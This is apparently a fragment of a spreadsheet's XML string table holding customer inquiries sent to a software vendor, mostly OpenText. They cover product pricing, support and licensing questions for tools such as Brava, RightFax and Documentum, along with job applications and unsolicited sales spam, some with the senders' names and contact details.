Do you offer a basical records management solution like that one of qumram for digital activities (not a comprehensive ECM)? If yes please send to me by tommorow the information respective the link regarding your solution._x000D_
_x000D_
Thanks and kind regards_x000D_
Serhat Guenes</t>
  </si>
  <si>
    <t>I have a client who uses RightFax. We send them fillable PDF forms.  They are attempting to fax the filled in forms, but the form data does not transmit via rightfax.  Do you know how this can be corrected?</t>
  </si>
  <si>
    <t>I'm interested in the product My Documentum as a connection tool with sharepoint.</t>
  </si>
  <si>
    <t>Looking for a software that can help us track the status of all the tasks required for our projects.</t>
  </si>
  <si>
    <t>Software brochure and functionalities</t>
  </si>
  <si>
    <t>Hello,_x000D_
Could you tell me what the most recent version of Docmanager is?_x000D_
Thank you</t>
  </si>
  <si>
    <t>Trying to download white paper "Managing Governance, Risk and Compliance with ECM and BPM" and after filling out the form, am taken to a page with links for BI only.  Please send me the white paper that I am requesting.</t>
  </si>
  <si>
    <t>We are currently using LegalKey 4.18 for Records Management and I understand the LegalKey is becoming an "end of life" product.  I wanted to touch base with you regarding product replacement suggestions for our Records Dept. _x000D_
Thank You,_x000D_
Pete</t>
  </si>
  <si>
    <t>We have been downloading the free BRAVA reader for some time now, I am looking to find out if this is still a possibility, as there is a mandatory contact form before I can download anything._x000D_
_x000D_
Your assistance is greatly appreciated_x000D_
Patrick Mackey</t>
  </si>
  <si>
    <t>Which products support viewing 3D Inventor *.iam files?   We currently use Brava Viewer for 2D._x000D_
Can you also quote me a price for 3 seats?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I have to update my Brava! Reader, but the download is the same version and it says to renew by April 19 2017._x000D_
I have tried to uninstall and reinstall but get the same result._x000D_
How can I update this program?</t>
  </si>
  <si>
    <t>We would like to discuss with a tech specialist regarding compatibility of OpenText DM with Office365. If you could please refer me to a specialist asap that would be great. Please email me the details. _x000D_
Thank you !</t>
  </si>
  <si>
    <t>I am having issues with Open Text Exceed 14 and want to see if the bugs I am experiencing have been resolved in version 15.  When I open multiple telnet sessions and then close one of them, there is a long delay and then the remaining tabs are replicated, sometimes several times over.  Sometimes when I close a tab, it crashes and I lose all my telnet connections.</t>
  </si>
  <si>
    <t>Pricing on BRIT Server</t>
  </si>
  <si>
    <t>I’m a product manager for a company looking for a WCM platform to help us grow. We are a content aggregator who repurposes content for a mobile audience. We need a new platform to help us simplify making changes to presentation layer templates, introduce personalization, ingest more content feeds, and drive the creation of an overall richer end user experience which will drive engagement. If your platform can help with these needs, I’d like to schedule a 15 introductory phone call. _x000D_
_x000D_
Thanks,_x000D_
Adan Perez_x000D_
Product</t>
  </si>
  <si>
    <t>I am trying to find online information on using XLST with ranges in e.spreadsheet designer.   We have owned the product for a bunch of years, and moved offices, and I am not sure where the actual books are.   Nor does my application seem to have the help files.  Can you help me find a pdf or something with information on using XLST with my ranges?  _x000D_
thanks_x000D_
Ted</t>
  </si>
  <si>
    <t>We have been using Brava Reader for years and updating when it says to. But this time I still get the 13 days to update. It seems to be trying to go back to a previous version. Can you help before the date it won't work. If there is a site to just update that would be great. Thanks!!</t>
  </si>
  <si>
    <t>Good Afternoon, _x000D_
_x000D_
SHI are a preferred reseller for Iron Mountain UK and as such,  I am contacting you to have you approved as a vendor.  Please could you confirm the best E-mail address to send our set-up forms to. The product required is Brava! Desktop, please could you also provide a quote for 1 X licence. Also, do you offer any reseller discount at all? _x000D_
_x000D_
Kind Regards, _x000D_
_x000D_
Ryan Jones</t>
  </si>
  <si>
    <t>Support Access &amp; Contract</t>
  </si>
  <si>
    <t xml:space="preserve">Nous cherchons actuellement à implémenter une solution DAM + workflow + CMS, et interfaçage avec nos solutions existantes. Section de l'édition. Puis-je être mise en contact avec quelqu'un? </t>
  </si>
  <si>
    <t>Dear Sirs, _x000D_
_x000D_
We have used the trial of your Brava Reader software and found it to perform very well for our requirements. Are you able to confirm the costs to buy this software for continued use on the basis of 4 users?_x000D_
_x000D_
Kind Regards, _x000D_
_x000D_
A Dayman.</t>
  </si>
  <si>
    <t>Is it possible to transfer a licence of Brava Desktop DX-P from one PC to another? If so, how?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, Would you interested in SAP HCM Technology Customers from UK.? _x000D_
_x000D_
We have 5,417 Tele verified leads of  SAP HCM Technology Customers from  UK.(Newest 2017)._x000D_
_x000D_
Records Includes: Contact Person name, Title, company Name, URL, Specific email address, Phone number, Fax Number, Direct mail details and so on_x000D_
_x000D_
Kindly revert with your requirement for a test data and additional information._x000D_
_x000D_
We have also available Tele verified leads of   SAP Business Objects (11,340), SAP Business One (3,987), SAP BW (7,263),SAP Crystal Reports(9,065), SAP Plant Maintainence(2,110), SAP R/3(14,113),SAP ECC(10,932),SAP ERP(20,187),SAP APO(1,164) SAP CRM(3,098),SAP HANA(9,033)etc… Technology Customers from Australia._x000D_
_x000D_
ALL PREMIUM QUALITY LEADS (Newest 2017)._x000D_
_x000D_
Cheers,_x000D_
_x000D_
Cheri  Hubbard_x000D_
CMO_x000D_
Lead pool_x000D_
Email: cheri.hubbard@lead-pool.com_x000D_
Phone: 302 351-3195_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Inquiry re eDocs for SharePoint/Opentext integration</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
 _x000D_
I am writing to apply for any eTMF Quality Specialist role for freelancer._x000D_
I have done Masters in Pharmaceutical Science which I studied at the London Metropolitan University which further built on my knowledge gained from Bachelor of Pharmacy in India. I have gained practical experience within the pharmaceutical industry in a variety of roles most recently as a eTMF Quality Specialist at Phlexglobal Ltd, UK. I now wish to develop my career further and am therefore looking for a new and suitably challenging position._x000D_
 _x000D_
I believe that my key qualities are my excellent interpersonal skills and communicative abilities, combined with my talent for effective organisation and prioritisation.  I see myself as a highly dedicated and strongly driven individual._x000D_
 _x000D_
I request you to kindly provide me your email address to forward my CV. Also please do not hesitate to give me a call.</t>
  </si>
  <si>
    <t>I am interested in some of your units, is there anyway you can get back to me with the ones you currently stock for proceedings.</t>
  </si>
  <si>
    <t xml:space="preserve">Fax cloud service,_x000D_
I was trying to get in touch with your office in Poznan (Poland), but nobody answers the phone... </t>
  </si>
  <si>
    <t>Need a demonstration of Open Text. We are looking at phasing out our current digital archival system.</t>
  </si>
  <si>
    <t>Planning to evaluate and procure OpenText™ Brava!™ for_x000D_
Microsoft® SharePoint® product for our Engineering Document Managment solution</t>
  </si>
  <si>
    <t>looking for a job in your organisation as a business analyst</t>
  </si>
  <si>
    <t xml:space="preserve">You may like to fix this linkhttp://www.opentext.com.au/what-we-do/opentext-release-16 </t>
  </si>
  <si>
    <t>Need fax solution since hardware died. Wanting to know pricing of cloud solution.</t>
  </si>
  <si>
    <t>Need to explore more about open text technology.</t>
  </si>
  <si>
    <t>Would like to demo OpenText Composer Notes</t>
  </si>
  <si>
    <t xml:space="preserve">Do you have support person in Asia can help our users in China to resolve EOD client issue? I can host Skype for Business conference and sharing screen with your support person.  </t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
We have reached out several times in hopes to get licensing and cost information for a midstream client in Houston interested in Documentum and have no heard back. Can someone please assist? _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kritika</t>
  </si>
  <si>
    <t>existing OpenText customer, interest in moving to cloud solution.</t>
  </si>
  <si>
    <t>Our contract lists Campaign Manager as one of the tools we have purchased. Could you point me to the documentation on its use ?</t>
  </si>
  <si>
    <t>Добрый день._x000D_
  Хотела вам предложить услуги модельного агентства Supermodels. _x000D_
Агентство Supermodels занимается подбором моделей, официантов, _x000D_
переводчиков, хостесс (встреча гостей на различных мероприятиях, _x000D_
в том числе корпоративах), ведущих и артистов, включая звезд, на_x000D_
выставки, конференции, показы, вручения наград, фотосъемки, видеорекламу._x000D_
Также осуществляет подбор необходимых реквизитов,покупку или пошив_x000D_
необходимой одежды._x000D_
Второе направление-это съемки видеороликов на производстве, выставке,_x000D_
мероприятии и рекламного характера. Тоже касается и фотосъемок._x000D_
Мы стараемся организовать все под ключ._x000D_
Агенству 7 лет, более 100 компаний в год с нами сотрудничают._x000D_
КОНТАКТЫ:  89629454174, olga_trambickaja@mail.ru._x000D_
www.supermodels.pro (в режиме заполнения)._x000D_
Анкеты отсылают. сросу на почту</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are running an old Vignette system, and we are just getting around to discussing upgrading it. At IEEE, it is called myIEEE. I do not know the Vignette version, but know it was implemented ~10 years ago._x000D_
_x000D_
My questions are, do you still maintain this type of platform and what is the latest version? If we needed support to upgrade an old Vignette, what would be a rough estimate?_x000D_
_x000D_
Thanks,_x000D_
Ray</t>
  </si>
  <si>
    <t>robbed my money</t>
  </si>
  <si>
    <t>Need some Answers to a question from a customer.</t>
  </si>
  <si>
    <t>Brava OpenText for IBM Solutions</t>
  </si>
  <si>
    <t>TTM wants to start using EDI separate from their current solution.  These are aerospace and defense sites so we must support ITAR with our customers.  The current OpenText solution in place in Asia will no longer suffice.  We need a US account manager to contact us for quote and discussion of the services available to us.</t>
  </si>
  <si>
    <t>We are updating all of the software within the company and I am looking for the end of support date for TeleForm Version 11.</t>
  </si>
  <si>
    <t>Is there such a things as a LiveLink Administrators Course?</t>
  </si>
  <si>
    <t>Hello!  What is the current version of Brava Desktop?  Our company currently has version 7.4.0.119, and we were wondering if we need to update.  Thanks!</t>
  </si>
  <si>
    <t>At the CNSC, we currently use eDOCS 5.3.1 as our EDRMS. We had an old solution to handle incoming faxes and looking to replace it. Can you provide a pricing quote to me for a FAX/OCR solution (RightFax with Add-on modules). And does the quote/add-on include the ability to integrate with eDOCS - i.e. saving an incoming fax as a PDF, OCR'ing and then saving to eDOCS. We receive a low volume of faxes; on average about 30 pages per day._x000D_
thanks,</t>
  </si>
  <si>
    <t>Could we schedule a Demo of Vendor Invoice Management (VIM) - Invoice Capture Center (ICC) &amp; ScanView Solution</t>
  </si>
  <si>
    <t>Need to information on DAM product</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
We are, Citi Application Readiness Team, need your assistance in order to gather info about below application compatibility and support for Win 10 as part of Window 10 Readiness initiative. CITI Bank has been using your software currently on Win 7 operating system._x000D_
_x000D_
We would like to know whether the below listed application is compatible and supported even for Win 10 (64 Bit) or is there any other higher version of application which would be compatible for Win10. If you have not tested for Win 10, could you please provide us with a tentative date by when we can reach you._x000D_
_x000D_
Application Name :_x000D_
1.EoD Launcher for CWS v12.9.18</t>
  </si>
  <si>
    <t>Prices for content management</t>
  </si>
  <si>
    <t>We are an ECD support-enabled reseller and need help connecting to PartnerView, OpenText Connect, partners.opentext.com etc.  None of our logins seem to work and I'm really struggling to get any help from you guys!</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in learning about options to move our on-prem RightFax services to a hosted, cloud subscriber model and would like to talk to someone regarding some options. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Kindly please contact me as soon as possible for a quotation._x000D_
_x000D_
I need a quotation for Documentum Entreprise Content Management cloud services_x000D_
_x000D_
- 1 quote for 5 users_x000D_
- 1 quote for 50 to 100 users_x000D_
_x000D_
This is really urgent! Thank you in advance._x000D_
_x000D_
Best regards, _x000D_
_x000D_
Franck KESZI</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
unser Endkunde braucht die Lizenzbestimmungen für das Produkt Team Developer 6.1 WIN32 for Windows. Können Sie mir diese zukommen lassen?_x000D_
_x000D_
Vielen Dank!_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Susanne Richter</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
We use your product in the Federal Swiss IT Office and in order to work with it as well, I need the same authorizations like my working colleagues who already have them. Could you please therefore assign me the same permission like you assigned to Mr. Vincent Brechbühl, Mr. Lorenzo Masiello both from Swiss Government IT department?_x000D_
_x000D_
Thank you very much in advance_x000D_
_x000D_
Riet Notter _x000D_
</t>
  </si>
  <si>
    <t>Is there a way to remove the expiry on the Free DWG viewer, this is use in the filed on PC's that have group policies that do not allow the end user to install or upgrade the software. so when they expire the user has to come back to have it done._x000D_
_x000D_
Is there a paid version that does not have the restriction we can purchase. we only want the viewer and it is the one we chose as it fitted our uses._x000D_
_x000D_
Steve.</t>
  </si>
  <si>
    <t>Would like to know if you can provide Fax Solutions in UAE.</t>
  </si>
  <si>
    <t>Follow Up</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
Looking into streamserve as a printing solution, looking at having 3 servers, each with multiple streams. _x000D_
_x000D_
How does licensing costs work?_x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t>Could you send me basic licensing quote for OpenText Brava (on-premise), basic requerements for on-premise deployment, supported file types for review. Thanks</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Ma version de Brava Reader (free) arrive à expiration fin du mois (19/04), pensez-vous que la nouvelle version sera bientôt disponible ?_x000D_
_x000D_
Merci d'avance,_x000D_
Cordialement,</t>
  </si>
  <si>
    <t>can i please get pricing on 80x Exceed 14 licenses for Virgin Australia?</t>
  </si>
  <si>
    <t>I would like to contact Mr. Tom Jenkins or he can email me as I have some ideas I like to share with him. (I am a teacher in Niagara.</t>
  </si>
  <si>
    <t>Hello! My company has an existing account under User ID AR681A. Our current GS1 prefix is 8418381 but we now have additional barcodes we bought under prefix 191746. Can you please advise if possible to add an additional prefix to our account, so I can start uploading these barcodes for our trading partners?</t>
  </si>
  <si>
    <t>product enquiry</t>
  </si>
  <si>
    <t>Currently using SharePoint, Office 365 - looking for a solution to manage record retention.</t>
  </si>
  <si>
    <t>Inquiry of rightfax solution by leverage SIP trunking and integration with lexmark and Xerox.</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to get more information on Rightfax Cloud solutions._x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are looking to confirm the employment of a former employee of yours. Would it be possible to forward this message to the HR department?_x000D_
_x000D_
We will be able to provide an authorization form signed by the candidate if required._x000D_
_x000D_
reference # 0891110_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>_x000D_
Good Afternoon,_x000D_
_x000D_
I'm attempting to make a shared profile read-only on machines where we have HostExplorer deployed. Is it possible to create profiles for all users that are read-only so that they cannot be modified? To add to this, is it possible to make it so that users cannot create new profiles?_x000D_
_x000D_
Thank you,_x000D_
Ralph Christian_x000D_
Client Computing Engineer_x000D_
Broward College</t>
  </si>
  <si>
    <t>Wanted to see if you might know of a tool that would allow me to analyze what queries are running from our Visual Manufacturing ERP against our sqlbase 8.1.0 database?</t>
  </si>
  <si>
    <t>Follow-up from meeting at NAB last year._x000D_
Would like to discuss workflow needs.</t>
  </si>
  <si>
    <t>Our office currently has a Captaris FaxPress server.  I believe this was purchased in 2010.  It has been failing and I want a quote on a new server.</t>
  </si>
  <si>
    <t>I am the application manager for DXC Technology (formerly HPE) AirlineSOA/Travel and Transportation.  We currently are using the Exstream software in our Charlotte datacenter but we are in the process of migrating our applications to the Tulsa datacenter.  Because we are migrating we will need to have the software installed in both datacenters and this is where my dilemma starts.  We are working through our environments starting with Test then Model Office and then Production but our license will only allow us to have a certain number of installs (this is what I have been told) and they are tied to each other through the environments.  What this means is I can’t install in Tulsa until I uninstall in Charlotte but that leaves my applications vulnerable and without the print services and that really isn’t an option.  I have been advised that we could get a 90 day temporary license but our move is expected to take longer than that.  We have moved on to Model Office but we don’t anticipate cutting the new production environment on until late September so this temporary license isn’t really going to work.  I was advised that we could purchase another license but that is not in the budget.  Do we have any other options to make our migration as easy as possible and not be impacted by this license issue?</t>
  </si>
  <si>
    <t>Inquire about Rightfax Cloud Connect.  in depth look as well as pricing.  Currently have a Rightfax fax server with 4 brooktrout channels</t>
  </si>
  <si>
    <t>Need to renew our maintenance contract</t>
  </si>
  <si>
    <t>We are seeking a single web interface to view, edit and collaborate on documents from both OpenText and Sharepoint. Can you suggest anything by email?</t>
  </si>
  <si>
    <t>I would like to talk to a sales person about the features available in your solutions and how they map onto the requirements for my client.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I represent the Fonds de solidarité FTQ (Fonds), a development capital with net assets of $12.2 billion, 620,000 shareholders and 2700 partner companies.  As part of an extensive application modernization program, Fonds would like to deploy a Office 365-friendly records management solution. To better understand the capabilities available on the market and detail our enterprise target architecture for document management, we are about to issue a small request for information to select solution vendors. Your company name was recommended by Gartner. Could you put me in contact with a sales person with whom I could discuss the specifics of this process? Thanks. _x000D_
</t>
  </si>
  <si>
    <t>We need updated vendor information and an updated quote. Can you please have someone get in touch with me?_x000D_
_x000D_
Thank you!_x000D_
_x000D_
Best,_x000D_
_x000D_
Melinda R Hecht</t>
  </si>
  <si>
    <t>Looking for information regarding support for our Rightfax software.  At this time we do not know if we have support_x000D_
_x000D_
Thank You,_x000D_
_x000D_
Mike Britton</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
As your organization is a part of the "NAB SHOW 2017", I am writing to check if you would be interested in acquiring the "List of Attendees with complete contact information" to send out pre and post event email campaigns etc. to increase your ROI._x000D_
_x000D_
Data Fields provided: - Company Name | Website |Contact Name |Job Title| Opt-In Email Address| Mailing Address| Phone No.| Fax No.| Industry Type| SIC Code | LinkedIn URLs (wherever available)_x000D_
_x000D_
We also specialize in building customized database according to a company's needs so please feel free to let us know if you have any database needs for your marketing initiatives._x000D_
_x000D_
Appreciate your time and look forward to hearing from you._x000D_
_x000D_
Best regards,_x000D_
Candace Nelson_x000D_
Demand Generation Team_x000D_
</t>
  </si>
  <si>
    <t>Our system is down and we need help. I have open a ticket: _x000D_
Service request 1-2879292081</t>
  </si>
  <si>
    <t>Inquiring to request Mr. Tom Jenkins to be the Guest of Honour and Speaker at our annual Squadron Mess Dinner (formal event) on the topic of Innovation. Formal request letter to follow.</t>
  </si>
  <si>
    <t xml:space="preserve">Invoice seems to have gone to the wrong address. Please could you send me my account managers number. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Our support contract is through SAP for Archive and Document Access as well as Employee File Management.  I am looking to get a colleague the same access as I have to the Knowledge Centre.  How do I arrange this?  His e-mail address is Anshul.Vir@boi.com. </t>
  </si>
  <si>
    <t>Can't seem to open a ticket online. I believe we have a current contract. Can someone help me with this? Thanks -Aaron</t>
  </si>
  <si>
    <t>KIndly send your quote for Bravareader for 150 users</t>
  </si>
  <si>
    <t>Bonjour_x000D_
Nous sommes interessé par votre solution ECM pour la présenté à un de nos client au Maroc est ce que c'est possible d'avoir votre representant au Maroc qu'il puisse nous aider à répondre au besoins de notre client._x000D_
Cordialement_x000D_
Cordialement</t>
  </si>
  <si>
    <t>can i get any projects with details explanations on birt development</t>
  </si>
  <si>
    <t>We need to order service for UPC Catalog service._x000D_
Please call me at 714-523-4111</t>
  </si>
  <si>
    <t>Interested to ask for quotation for a SAP Data Archiving project.  Our company is running SAP for almost 7 years already, thus we are looking for company who can do data archiving for the 5 yrs older data in our SAP system.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
If You’re looking for an Outsourcing Agency, we’ll be happy to become a prospective partner with your company. Our extensive services involve Web Design and Development, SEO, and Mobile APP And E-Commerce. _x000D_
_x000D_
SEO Service @ $99_x000D_
Web Design  @ $299_x000D_
E-Commerce  @ $999_x000D_
Mobile APP  @ $1999_x000D_
_x000D_
We look forward to have a brief conversation to discuss further._x000D_
_x000D_
Best_x000D_
Lisa | Marketing Executive_x000D_
Skype: ranksindia</t>
  </si>
  <si>
    <t>URGENT - URGENT - URGENT_x000D_
Trying to get hold of Charles Paltridge, for an update on a Captiva Job that Kunal Katdare is doing for us. but I have had no response._x000D_
_x000D_
Please get someone to contact me by email or Mobile, as this is been escalated up at ASB._x000D_
_x000D_
Thank you in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for DMS for autocad and other documents with share point integration. </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hello, _x000D_
_x000D_
I am currently a software engineering student at Cal Poly looking for an internship in the Rockville/D.C. Metropolitan area. If you could offer any information on possible opportunities for internships with your company I would be extremely grateful. Also if there is someone I can contact who would be able to help me better I would love to get their contact info. Thank you so much for your time!_x000D_
_x000D_
Regards,_x000D_
_x000D_
Matt Triau </t>
  </si>
  <si>
    <t>Need more information and quote for OpenText Application Governance &amp; Archiving for Microsoft® SharePoint</t>
  </si>
  <si>
    <t xml:space="preserve">Questions on current and future pricing </t>
  </si>
  <si>
    <t>Trying to find out when v10.5.1 goes end of life</t>
  </si>
  <si>
    <t>_x000D_
http://asekose.am/ru_RU/news/27/236828-deny-blagodarenia--ot-djordja-vasingtona-do-ari-vukovic.html_x000D_
_x000D_
(read an article (with Google Translate) about my dear friend from USA/Mexico - Ara Vukovic)._x000D_
_x000D_
 http://investinsakhalin.ru/en/about/news/vld_global_solutions_offers_to_consider_cooperation_options_the_companies_of_our_region_/_x000D_
_x000D_
     DEAR SIRS!_x000D_
_x000D_
     Let's get to know each other! I would like to introduce our company (VLD Global Solutions)._x000D_
_x000D_
     VLD group consisting so far of three operating companies:_x000D_
_x000D_
1) VLD Global Solutions (international development);_x000D_
_x000D_
2) Viva Gm S.r.l. (distribution);_x000D_
_x000D_
3) Trim and Fashion Srl (design/fashion accessories)._x000D_
_x000D_
     VIVA GM Srl was founded in 2014. Our company’s mainly focused on customers and make every effort so that the client has received the highest quality and safe product. Company VIVA GM Srl is focused on growth and development. The company’s mission is to become the first distribution company. That’s why we are constantly expanding our destinations, adding new brands._x000D_
Since its founding company’s goal is to provide end-users premium products of exceptional quality across the country, in all regions of the country._x000D_
_x000D_
     VLD Global Solutions is a management consulting company focused on socio-cultural context, territorial marketing, cultural management and communication. Our mission is to support the growing process, the development, the communication and the relationship processes of public and private companies. VLD business strategy aims to the continual enhancement and development of our services, cooperation and preservation of good business relationship with our clients._x000D_
_x000D_
Services and activities carried out by VLD relate to all the stages of an internationalization process, from the collection of information, for the definition of an action plan, for the development and for the regime of on-site activities.Temporary management for international development of the business:_x000D_
_x000D_
 _x000D_
_x000D_
     VLD manag</t>
  </si>
  <si>
    <t>Hi, I'm interested to your software product that deals with school/educational solution/system. May I request for a business meeting via skype to know more about your product. If possible I would like to be your distributor in the Philippines. Thank you very much._x000D_
_x000D_
skype ID: juliusinfante</t>
  </si>
  <si>
    <t>i need a  Intern in open text corporation</t>
  </si>
  <si>
    <t xml:space="preserve">I am writing for you regard ECM solution._x000D_
We are North West Army Force Hospital at Tabuk city on Saudi Arabia intend to have ECM solution as new project on 2017.Therefore we need contact information  for your presenter in Saudi Arabia to arrange a demonstration of your solution._x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
We are an IT integration company. One of our customers is looking for a FAX Server solution._x000D_
_x000D_
Please get in touch to me in order to work on this opportunity._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Mahmoud MHIRI</t>
  </si>
  <si>
    <t>Inquiring about First Class hosted pricing.</t>
  </si>
  <si>
    <t>from EMC_x000D_
my account id : 134672768_x000D_
Order Number:4500449272-30661802 _x000D_
Order Date:Jun 29, 2015_x000D_
 PO Number:BAS-147_x000D_
my server Captiva is stoped working._x000D_
EMC Eng. Mohamed Tantawy tell me he purchase 2 million document ._x000D_
Please i have a big problem</t>
  </si>
  <si>
    <t>My phone button on my iPhone is not working.</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
we are a leading German consulting firm in the field of corporate communications, capital markets and corporate social responsibility. Listed companies in Germany, Austria and Switzerland rely on our advice when it comes to corporate reporting, corporate publishing, investor relations and public relations._x000D_
_x000D_
In this context, we are currently looking for technologies that allow us to quickly analyse large quantities of publicly-available corporate reporting documents (annual reports, quarterly reports, integrated reports, corporate responsibility reports, etc.). I understand that your company provides solutions to this end, and I would be curious to learn more about the specific services that are available and the related costs._x000D_
_x000D_
I thank your very much in advance for your reply!_x000D_
_x000D_
Best regards,_x000D_
Kai Roeske</t>
  </si>
  <si>
    <t>Interested and eligible candidates are required to approach OpenText Employees and Employee need to send your resume to HR email with Subject line: Intern referral resume. Use social media platform i.e Facebook, LinkedIn and Twitter to approach Employees for Referral._x000D_
I am interested to do intern in your company so can u provide some help for it.</t>
  </si>
  <si>
    <t>Price for Brava DWG  Vieawer</t>
  </si>
  <si>
    <t>Hello ,_x000D_
 _x000D_
    Good Morning!_x000D_
  We are available to provide free lancing support on OpenText Testing(manual), SAP ERP ILM/Data Archiving, Content Server and OpenText Archiving along with EIM’s (VIM , EFM, TRM, xECM &amp; Document presentment) at a competitive price._x000D_
   _x000D_
Please let me know if you are looking for one._x000D_
 _x000D_
Services offered: Analysis. Implementations, Integration, Training, Customizations, Upgrades, outsourcing _x000D_
Thanks,_x000D_
Manaswini</t>
  </si>
  <si>
    <t>Dear Ann Hinrichs,_x000D_
_x000D_
Hi !!  Hope u r doing good._x000D_
_x000D_
I would like to introduce my company Shri Lakshmi Cotsyn Ltd. which is a USD$ 400 million group of seven companies diversified in different areas so as to fulfill each and every demand of our worldwide customers, it is the largest Integrated Towel manufacturer in Asia with in-house production capacity of 15000 MT per annum, a leading supplier to top esteemed retailers as mentioned below :-_x000D_
_x000D_
Walmart_x000D_
Target_x000D_
H&amp;M_x000D_
Macys_x000D_
Sears_x000D_
Sam’s Club_x000D_
El Corte Ingles_x000D_
Etc….._x000D_
_x000D_
_x000D_
SHRI LAXMI COTSYN LTD. CERTIFICATIONS:-_x000D_
a). SA 8000:2008_x000D_
b). SEDEX_x000D_
c). OEKO TEX 100_x000D_
d). REACH_x000D_
e). GOTS_x000D_
f). FAIR TRADE_x000D_
g). ISO 14000:2004_x000D_
_x000D_
_x000D_
a).Our Basic Towel range:-_x000D_
Solid and Yarn Dyed Dobby Collection _x000D_
Solid &amp; Yarn dyed JQ Collection_x000D_
Kitchen Towels_x000D_
Polyester insert Towels_x000D_
Beach Towel collections_x000D_
Speciality Towels_x000D_
Embroidered Towels_x000D_
Printing Towels_x000D_
Hotel Towels _x000D_
Etc….._x000D_
_x000D_
b).Our Specialty Towel range :-_x000D_
Anti Microbial  _x000D_
Aroma Finish_x000D_
Zero Twist_x000D_
Low Twist_x000D_
Vitamin E Finish _x000D_
Cotton Bamboo_x000D_
Soya(Protein fibers)_x000D_
Long Lasting Fastness. _x000D_
Etc…  _x000D_
_x000D_
_x000D_
It would be great if we could set up a personal meeting with you which would give you a much better idea about our company, product Line &amp; pricing, I look forward to our meeting and hopefully doing business with ur esteem organization._x000D_
_x000D_
Thanking you and assuring the best of our services at all times to come _x000D_
_x000D_
_x000D_
Warm Regards,_x000D_
Gulshan Sharma_x000D_
Vice President._x000D_
Hand Ph. : + 91 9818029964,9999664558_x000D_
E-mail: gulshan@shrilakshmi.in_x000D_
Shri Lakshmi Cotsyn Ltd._x000D_
Regd. Office:_x000D_
19/ X-1, Krishnapuram, G.T. Road, Kanpur – 7 (U.P.) INDIA_x000D_
Corporate And Marketing Office:_x000D_
C-40, Sec.57, Noida, Uttar Pradesh. (INDIA)_x000D_
New Delhi Office:_x000D_
408 A J Chamber 953 Pyare Lal Road, Karol Bagh, New Delhi – 110005_x000D_
Works:_x000D_
P.O. Aung, G.T. Road, Distt. Fatehpur (U.P.)_x000D_
UPSIDC Ind. Area, Malwan, Distt. Fatehpur (U.P.)_x000D_
Liwaspur, Sonepat (HARYNA)_x000D_
Devbhoomi Ind. Estate, Roorkee (Uttarakhand)_x000D_
Website - www.shri</t>
  </si>
  <si>
    <t>Dear sir /madam _x000D_
_x000D_
I AM AN information Technology fresh Graduate and I wish to be part of your company.I am very mucj trainae.and fast learner.</t>
  </si>
  <si>
    <t xml:space="preserve">I need the following_x000D_
1. Dev guide _x000D_
2. Trial version of the software_x000D_
3. Point me at the product I should be using to be able to open and markup documents in an html5 environment._x000D_
</t>
  </si>
  <si>
    <t>Is your product for law firms, particularly doc &amp; recd management affordable for a small law firm with just one or two attorneys and a couple/few support staff members? Please let me know./ Thank you._x000D_
_x000D_
Mark</t>
  </si>
  <si>
    <t xml:space="preserve">From	Subject	Received	Size	Categories	_x000D_
support@easylink.com	Failure notice: LLCF Nardandrea 113 FUL 23 Mar 2017	12:38 PM	46 KB		</t>
  </si>
  <si>
    <t>Hi Team, could you please connect us with Sales guy from Indian Region. Can we have a quick call on the OpenText ECM product</t>
  </si>
  <si>
    <t>A pleasant good day, My name is Machaelia Edwards. At this moment I am working with the Information Security section at at the above bank. During the month of June we hold a InfoSec Awareness seminar and exhibition. I would be grateful if someone can contact me maybe to show a demo of your products or if its something that your company offer that can assist us in proving our users with crucial information on Information Security. Please contact me at your earliest convenience at mmedwards@centralbankbahamas.com</t>
  </si>
  <si>
    <t>Please let me know what course to take for learning xECM for Content Server, thank-you (i.e. Extended ECM).</t>
  </si>
  <si>
    <t>We have a 3rd party, Acom Solutions, that handles our invoice payments.  We want to set up an account they can use to pay our invoices.  I've created an account under the email of ach@genovaproducts, but it cannot access the link on the invoice we receive which is "https://support.opentext.com/rr-RC182215-301518" for this particular invoice.  How do we get enough access to the support web site to allow this email log in to pay our invoices?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Ron Seidl</t>
  </si>
  <si>
    <t>Looking for MIM Training for our Admin and Support Teams.  We have a smaller group so wondering if you offer anything at your location?</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
Please confirm that you are the supplier contact for our account._x000D_
Please provide a contact phone number._x000D_
_x000D_
Reginald Mason_x000D_
 _x000D_
_x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We have an old installation of Docs Open 4.0 and am wondering about upgrading it.  </t>
  </si>
  <si>
    <t>We are looking into possibly replacing our existing fax infrastructure and going to the cloudfax Fax2mail serivce, would like more info and possible pricing</t>
  </si>
  <si>
